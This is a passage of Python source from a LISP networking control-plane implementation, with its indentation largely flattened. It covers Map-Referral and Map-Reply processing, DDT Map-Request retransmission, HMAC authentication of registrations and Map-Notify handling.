cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporarily return the requested prefix until we have
# lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and last_node in ref.referral_set):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Reply has been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in list(referral.referral_set.values()):
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
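#
# Minimal sketch of the selection above using (priority, name) tuples in
# place of lisp_referral_node objects (illustrative only):
#
def example_pick_referral(nodes, hashval):
    best = []
    for priority, name in nodes:
        if (len(best) == 0 or best[0][0] == priority):
            best.append((priority, name))
        elif (best[0][0] > priority):
            best = [(priority, name)]
        #endif
    #endfor
    if (len(best) == 0): return(None)
    return(best[hashval % len(best)][1])
#enddef
#
# example_pick_referral([(1, "a"), (1, "b"), (2, "c")], 5) returns "b";
# the two priority-1 nodes form the candidate set and 5 % 2 selects index 1.
#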
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# The caller may want us to use the root versus a best-match lookup. We
# only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Do Map-Resolver processing of a Map-Request received from an ITR. We need
# to forward this Map-Request to the longest matched referral from the
# referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache.lookup_cache(eid_record.group, True)
if (mc):
mc = mc.lookup_source_cache(eid_record.eid, False)
#endif
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data is included in the RLOC record.
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for the map-cache entry. Ignore an RLOC with a
# different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two latter cases.
#
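# As a concrete illustration (hypothetical RLOC-set): an xTR keeps a
# private RLOC (forced to priority 1 and UNREACH state until probed) and
# the priority-254 RTR RLOC while dropping public non-254 RLOCs; an RTR
# keeps the private and public RLOCs but drops the 254 RTR RLOC.
#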
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# An RTR should not put an RTR RLOC in its map-cache, but xTRs do.
# Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password.encode(), packet, hashalg).hexdigest()
else:
hashval = hmac.new(password.encode(), packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over the Map-Register packet and compare with
# the one transmitted in the packet, stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print both hash values if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
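#
# Self-contained sketch of the SHA1 verification path above (hypothetical
# helper with sample parameters; mirrors lisp_hash_me() with do_hex=True):
#
def example_verify_auth_sha1(zeroed_auth_packet, auth_hex, password):
    import hmac, hashlib
    hashval = hmac.new(password.encode(), zeroed_auth_packet,
        hashlib.sha1).hexdigest()
    return(hashval == auth_hex)
#enddef
#
# The registerer computes the HMAC over the Map-Register with its auth
# fields zeroed; the verifier recomputes it the same way and compares hex
# digests, as lisp_verify_auth() does above.
#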
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
